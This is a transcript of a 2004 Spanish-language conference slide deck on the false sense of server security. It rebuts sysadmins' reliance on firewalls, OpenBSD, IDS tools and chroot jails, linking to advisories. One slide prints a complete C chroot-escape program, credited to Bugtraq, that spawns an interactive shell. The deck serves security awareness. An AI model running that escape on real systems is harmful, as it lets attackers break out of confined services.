2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software...
-
Upload
elena-escalona -
Category
Documents
-
view
236 -
download
0
Transcript of 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software...
![Page 1: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/1.jpg)
2004-02-13El falso sentido de la
seguridadPresentación para el Congreso Nacional de Software Libre CONSOL 2004
Derechos reservados © 2002-2003 Sandino Araico Sánchez <[email protected]>
Se permite ilimitadamente el uso, copia, redistribución con o sin modificaciones siempre y cuando se mantenga el aviso de derecho de autor y se anoten al final de la presentación todas las modificaciones que se llevan a cabo conservando la historia de las modificaciones que hagan las demás personas e indicando la fecha de cada modificación y el nombre de la persona que la llevó a cabo.
![Page 2: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/2.jpg)
Me siento muy seguro
![Page 3: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/3.jpg)
Porque a nadie le interesa mi servidor
Porque si me hackean ¿qué importa?
![Page 4: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/4.jpg)
Porque a nadie le interesa mi servidor...
¿ni a los defacers brasileños?http://www.zone-h.org/en/hallofshame
¿ni a los spammers?http://www.google.com/search?q=spam+vulnerability
![Page 5: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/5.jpg)
Porque si me hackean ¿qué importa?
¿Y si me usan de trampolín para atacar a otros sitios?ftp://ftp.porcupine.org/pub/security/tcp_wrapper.txt.Z
¿Y si me usan de trampolín para mandar spam?http://slashdot.org/search.pl?topic=111
![Page 6: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/6.jpg)
Porque tengo mi firewall IPTables
![Page 7: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/7.jpg)
Porque tengo mi firewall IPTables...
¿Y qué no sabes que IPTables no te protege un servicio que esté vulnerable?http://www.google.com/search?q=smtp+buffer+overflow+vulnerability
![Page 8: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/8.jpg)
Porque uso OpenBSD
![Page 9: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/9.jpg)
Porque uso OpenBSD...
¿Y qué versión usas?¿Y cuándo fue la última vez que actualizaste tu sistema?http://www.openbsd.org/security.htmlhttp://www.openbsd.org/errata.html#sysvshmhttp://www.openbsd.org/errata33.html#sendmail
![Page 10: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/10.jpg)
Porque uso OpenBSD...
¿Y tienes bién configurado tu servidor?¿Buenos passwords?¿Usuarios que se conecten por FTP, POP o IMAP?
![Page 11: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/11.jpg)
Porque mi servidor siempre está actualizado
![Page 12: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/12.jpg)
Porque mi servidor siempre está actuali...
¿Has escuchado hablar de los zero days?http://www.google.com/search?q=Zero+day+exploit
![Page 13: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/13.jpg)
Porque mi servidor siempre está actuali...
¿Y tienes bién configurado tu servidor?¿Buenos passwords?¿Usuarios que se conecten por FTP, POP o IMAP?
![Page 14: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/14.jpg)
Porque pasé la auditoría
(Nessus no me encontró vulnerable)
![Page 15: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/15.jpg)
Porque núnca nadie me
ha penetrado
![Page 16: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/16.jpg)
Porque núnca nadie me
ha ¿penetrado?¿Asististe a la plática del martes a las 18 horas en el salón de seminarios de la biblioteca?
![Page 17: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/17.jpg)
Porque tengo unos administradores de
sistemas buenísimos
![Page 18: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/18.jpg)
Porque en mi Linux no corren los virus
Porque en mi PowerPC no corren los exploits
![Page 19: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/19.jpg)
Porque en mi Linux no corren los virus...
http://www.viruslist.com/eng/viruslistfind.html?rub4=001&findWhere=&findTxt=Linux
![Page 20: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/20.jpg)
Porque en mi PowerPC no corren los exploits...#include <sys/types.h>#include <sys/stat.h>main() { int i; if (chdir("/") != 0) exit(1); mkdir("kk", 0777); if (chroot("kk") != 0) exit(1); for (i=0; i<50; i++) { if (chdir("..") != 0) exit(1); if (chmod("..", S_IXOTH) != 0) exit(1); } if (chroot(".") != 0) exit(1); execl("/bin/sh", "sh", "-i", (char *)0); exit(0); }
Fuente: Bugtraq
![Page 21: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/21.jpg)
Porque tengo un SNORT que me avisa
todo y cierra los puertos
![Page 22: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/22.jpg)
Porque tengo un SNORT que me avisa
todo y cierra los puertos...
http://www.securityfocus.com/advisories/5302
¿Y qué a caso estás suponiendo que Snort es invulnerable?
![Page 23: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/23.jpg)
Porque acabo de instalar Tripwire
![Page 24: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/24.jpg)
Porque acabo de instalar Tripwire
Pero acabadito de instalar, de tal manera que todos los troyanos instlados previamente ya se encuentran firmados y Tripwire nos avisará cuando sean limpiados.
![Page 25: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/25.jpg)
Porque creo firmemente en la
seguridad por obscuridad y nadie
sabe cómo funcionan las aplicaciones que
hice
![Page 26: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/26.jpg)
Porque me certifica Verisign
![Page 27: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/27.jpg)
Porque todos mis servicios los tengo
chrooteados
![Page 28: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/28.jpg)
Porque todos mis servicios los tengo
chrooteados...¿Sabías que hay técnicas para salirse de la jaula?http://search.securityfocus.com/cgi-bin/swsearch/swish.cgi?query=chroot&metaname=alldoc
![Page 29: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/29.jpg)
Porque no tengo ningún puerto abierto
![Page 30: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/30.jpg)
Porque no tengo ningún puerto
abierto...¿Y qué, no navegas?¿Y de casualidad no estarás usando GAIM?http://www.securityfocus.com/advisories/6293
![Page 31: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/31.jpg)
Porque no tengo ningún puerto
abierto...
Ahora que si se trata de un servidor creo que tienes un problema grave de negación de servicio.
![Page 32: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/32.jpg)
Porque uso GR Security
![Page 33: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/33.jpg)
Porque uso GR Security...
Pues ¿Qué crees?http://forums.grsecurity.net/viewtopic.php?t=611http://forums.grsecurity.net/viewtopic.php?t=613http://archives.neohapsis.com/archives/bugtraq/2003-12/0011.html
![Page 34: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/34.jpg)
Porque me audité a mi mismo y no me
pude penetrar
![Page 35: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/35.jpg)
Porque me audité a mi mismo y no me pude penetrar...
¿Y ya te auditó un tercero?¿Y tus IDSes detectaron las pruebas de penetración?
![Page 36: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/36.jpg)
Porque de todos los exploits que bajé de
Security Focus ninguno jaló
![Page 37: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/37.jpg)
Porque de todos los exploits ... ninguno
jaló...¿Y los revisaste línea por línea para asegurarte de que no estuvieran troyaneados?¿Y estás seguro de haber entendido perfectamente su funcionamiento?
![Page 38: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/38.jpg)
Porque me llamo Theo y reviso línea por línea
el código fuente de todos los programas que correrán en mi
máquina y los compilo a pata
![Page 39: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/39.jpg)
Porque me llamo Theo...
Ah, por cierto, http://www.google.com/search?q=OpenBSD+remote+roothttp://www.google.com/search?q=OpenBSD+remote+shellhttp://www.google.com/search?q=OpenBSD+local+root
No los quiero convencer, sólo muestro las evidencias -- J. Maussan
![Page 40: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/40.jpg)
Porque acabo de poner mi propio puesto de tacos
![Page 41: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/41.jpg)
Conclusiones
Sysadmines ya pónganse las pilas
Consultores ya dejen de tomarles el pelo a sus clientes
La paranoia rula, sobre todo cuando sabes lo que esás haciendo
![Page 42: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/42.jpg)
Muchas graciasSandino Araico Sánchez <[email protected]>
![Page 43: 2004-02-13 El falso sentido de la seguridad Presentación para el Congreso Nacional de Software Libre CONSOL 2004 Derechos reservados © 2002-2003 Sandino.](https://reader033.fdocuments.es/reader033/viewer/2022061617/5665b4671a28abb57c913b08/html5/thumbnails/43.jpg)
¿Comentarios?